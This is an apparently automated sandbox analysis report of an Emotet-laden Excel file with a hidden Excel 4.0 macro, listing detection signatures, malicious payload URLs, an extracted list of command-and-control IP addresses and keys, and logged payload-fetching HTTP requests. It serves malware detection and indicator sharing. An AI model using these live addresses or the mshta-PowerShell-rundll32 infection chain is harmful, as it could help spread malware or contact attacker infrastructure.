Windows Analysis Report
check.xls

Overview

General Information

Sample Name: check.xls
Analysis ID: 562510
MD5: b4ab7bf24d88711b77651735221d3c99
SHA1: 1aac1e6607873f7ae92962f08ca7d2ebeb280917
SHA256: 331c3b9e917fa24eff11b2650207f76612d05a572c6f4fcb4cbb37ddc1da295c
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches for user specific document files
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

barindex
Source: http://91.240.118.168/zzx/ccv/fe.htmlT Avira URL Cloud: Label: malware
Source: https://www.yeald.finance/wp-adm Avira URL Cloud: Label: malware
Source: https://palankhir.hu/tools/GJRNh Avira URL Cloud: Label: malware
Source: https://palankhir.hu/tools/GJRNhZHz/ Avira URL Cloud: Label: malware
Source: http://tattooblog.cn/wp-includes/KJLv/PE3 Avira URL Cloud: Label: malware
Source: https://weddingbandsirelandjbk.com/hgsynt2/o/ Avira URL Cloud: Label: malware
Source: https://umanostudio.com/wp-admin Avira URL Cloud: Label: malware
Source: http://tattooblog.cn/wp-includes/KJLv/ Avira URL Cloud: Label: malware
Source: http://masboni.com/wp-admin/3zUQl/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlfunction Avira URL Cloud: Label: malware
Source: http://starspeedng.com/One-File/ Avira URL Cloud: Label: malware
Source: http://starspeedng.com/One-File/U3Trml/ Avira URL Cloud: Label: phishing
Source: http://91.240.118.168/zzx/ccv/fe.htmlp Avira URL Cloud: Label: malware
Source: https://getcode.info/wp-content/ Avira URL Cloud: Label: malware
Source: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3 Avira URL Cloud: Label: malware
Source: http://sneakadream.com/wp-conten Avira URL Cloud: Label: phishing
Source: https://tanquessepticos.com/wp-a Avira URL Cloud: Label: malware
Source: http://sneakadream.com/wp-content/pccmAOq/ Avira URL Cloud: Label: malware
Source: https://www.yeald.finance Avira URL Cloud: Label: malware
Source: https://www.yeald.finance/wp-admin/1WgPRm/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlB Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.html Avira URL Cloud: Label: malware
Source: http://tattooblog.cn/wp-includes Avira URL Cloud: Label: malware
Source: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/ Avira URL Cloud: Label: malware
Source: https://www.yeald.finance/wp-admin/1WgPRm/ Avira URL Cloud: Label: malware
Source: https://allaagency.ro/wp-admin/7 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlC: Avira URL Cloud: Label: malware
Source: https://chochungcuhanoi.com/wp-c Avira URL Cloud: Label: malware
Source: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3 Avira URL Cloud: Label: malware
Source: https://palankhir.hu/tools/GJRNhZHz/PE3 Avira URL Cloud: Label: malware
Source: http://masboni.com/wp-admin/3zUQl/ Avira URL Cloud: Label: malware
Source: https://falah.org.pk/vegasvulkan Avira URL Cloud: Label: phishing
Source: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlv1.0 Avira URL Cloud: Label: malware
Source: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/ Avira URL Cloud: Label: malware
Source: https://weddingbandsirelandjbk.com/hgsynt2/o/PE3 Avira URL Cloud: Label: malware
Source: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlmshta Avira URL Cloud: Label: malware
Source: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3 Avira URL Cloud: Label: malware
Source: http://sneakadream.com/wp-content/pccmAOq/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.pngPE3 Avira URL Cloud: Label: malware
Source: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/ Avira URL Cloud: Label: malware
Source: http://starspeedng.com/One-File/U3Trml/PE3 Avira URL Cloud: Label: phishing
Source: https://getcode.info/wp-content/QDx8b5j/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.html4E Avira URL Cloud: Label: malware
Source: https://allaagency.ro/wp-admin/7/PE3 Avira URL Cloud: Label: malware
Source: https://getcode.info/wp-content/QDx8b5j/PE3 Avira URL Cloud: Label: malware
Source: http://masboni.com/wp-admin/3zUQ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.png Avira URL Cloud: Label: malware
Source: https://allaagency.ro/wp-admin/7/ Avira URL Cloud: Label: malware
Source: 19.2.rundll32.exe.2d10000.14.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: check.xls ReversingLabs: Detection: 37%
Source: www.yeald.finance Virustotal: Detection: 8% Perma Link
Source: C:\Users\Public\Documents\ssd.dll Joe Sandbox ML: detected

Compliance

barindex
Source: unknown HTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
Source: global traffic DNS query: name: www.yeald.finance
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 94.130.116.76:443

Networking

barindex
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic HTTP traffic detected: GET /wp-admin/1WgPRm/ HTTP/1.1Host: www.yeald.financeConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zzx/ccv/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: global traffic HTTP traffic detected: GET /zzx/ccv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View IP Address: 94.130.116.76 94.130.116.76
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.664996104.00000000036DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.664996104.00000000036DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.664996104.00000000036DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe
Source: mshta.exe, 00000004.00000003.402324314.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.425113166.0000000003440000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.421421637.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.421468026.00000000003E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419457263.0000000003469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.425203497.0000000003469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.421392280.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.html
Source: mshta.exe, 00000004.00000003.419457263.0000000003469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.425203497.0000000003469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.html4E
Source: check.xls.0.dr String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlB
Source: mshta.exe, 00000004.00000002.425113166.0000000003440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlC:
Source: mshta.exe, 00000004.00000003.402330326.00000000003AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlT
Source: mshta.exe, 00000004.00000002.421369851.0000000000330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.404350212.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.403930590.0000000002C55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.html
Source: mshta.exe, 00000004.00000002.421369851.0000000000330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.421392280.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlp
Source: mshta.exe, 00000004.00000003.419457263.0000000003469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.425203497.0000000003469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.htmlv1.0
Source: powershell.exe, 00000006.00000002.664996104.00000000036DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.png
Source: powershell.exe, 00000006.00000002.664996104.00000000036DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zzx/ccv/fe.pngPE3
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.668574742.000000001B838000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.659537368.000000000048E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.668636822.000000001B8B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://masboni.c
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://masboni.com/wp-admin/3zUQ
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://masboni.com/wp-admin/3zUQl/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://masboni.com/wp-admin/3zUQl/PE3
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.668636822.000000001B8B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.668636822.000000001B8B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.668574742.000000001B838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.668574742.000000001B838000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.659537368.000000000048E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sneakadream.com/wp-conten
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sneakadream.com/wp-content/pccmAOq/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sneakadream.com/wp-content/pccmAOq/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://starspeedng.com/One-File/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://starspeedng.com/One-File/U3Trml/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://starspeedng.com/One-File/U3Trml/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tattooblog.cn/wp-includes
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tattooblog.cn/wp-includes/KJLv/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tattooblog.cn/wp-includes/KJLv/PE3
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.659446091.0000000000420000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/c
Source: powershell.exe, 00000006.00000002.659446091.0000000000420000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/cclean6o
Source: powershell.exe, 00000006.00000002.659446091.0000000000420000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.403805062.000000000046C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.403876535.000000000046F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.659446091.0000000000420000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.403805062.000000000046C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.403876535.000000000046F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.419157261.0000000003472000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419078794.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.402396144.000000000042B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.422077589.000000000042B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419408582.00000000034FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.401952510.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418931389.0000000003526000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.401986789.0000000003526000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.426673975.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.426692369.0000000003526000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.426736724.0000000003FDA000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419078794.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419408582.00000000034FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: rundll32.exe, 00000013.00000002.659722303.000000000067E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.659683708.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/kHYKQ
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allaagency.ro/wp-admin/7
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allaagency.ro/wp-admin/7/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allaagency.ro/wp-admin/7/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chochungcuhanoi.com/wp-c
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://falah.or
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://falah.org.pk/vegasvulkan
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getcode.info/wp-content/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getcode.info/wp-content/QDx8b5j/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getcode.info/wp-content/QDx8b5j/PE3
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://palankhir.hu/tools/GJRNh
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://palankhir.hu/tools/GJRNhZHz/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://palankhir.hu/tools/GJRNhZHz/PE3
Source: powershell.exe, 00000006.00000002.668616282.000000001B884000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.668574742.000000001B838000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.659537368.000000000048E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.668636822.000000001B8B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tanquessepticos.com/wp-a
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/
Source: powershell.exe, 00000006.00000002.665179832.0000000003833000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3
